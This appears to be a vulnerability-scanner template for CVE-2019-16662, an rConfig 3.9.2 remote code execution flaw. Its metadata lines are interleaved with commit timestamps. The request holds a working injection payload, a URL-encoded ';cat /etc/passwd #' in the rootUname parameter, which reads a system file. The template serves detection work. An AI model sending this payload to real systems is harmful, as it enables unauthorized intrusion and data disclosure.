2021-01-02 04:59:06 +00:00
id : CVE-2019-16662
2020-09-11 13:25:48 +00:00
info :
2022-11-29 05:35:48 +00:00
name : rConfig 3.9.2 - Remote Code Execution
2020-09-11 13:25:48 +00:00
author : pikpikcu
severity : critical
2022-05-17 09:18:12 +00:00
description : rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.
2023-09-06 12:53:28 +00:00
remediation : |
Upgrade to a patched version of rConfig (3.9.3 or later) or apply the vendor-supplied patch to mitigate this vulnerability.
2022-04-01 08:51:42 +00:00
reference :
- https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/
- https://nvd.nist.gov/vuln/detail/CVE-2019-16662
2022-05-17 09:18:12 +00:00
- https://drive.google.com/open?id=1OXI5cNuwWqc6y-7BgNCfYHgFPK2cpvnu
2023-04-12 10:55:48 +00:00
- http://packetstormsecurity.com/files/154999/rConfig-3.9.2-Remote-Code-Execution.html
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/155186/rConfig-3.9.2-Command-Injection.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-16662
cwe-id : CWE-78
2023-07-15 16:29:17 +00:00
epss-score : 0.97573
2023-08-31 11:46:18 +00:00
epss-percentile : 0.99999
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : rconfig
product : rconfig
2023-04-12 10:55:48 +00:00
tags : intrusive,rconfig,packetstorm,cve,cve2019,rce
2020-09-11 13:25:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-09-11 13:25:48 +00:00
- method : GET
path :
- "{{BaseURL}}/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200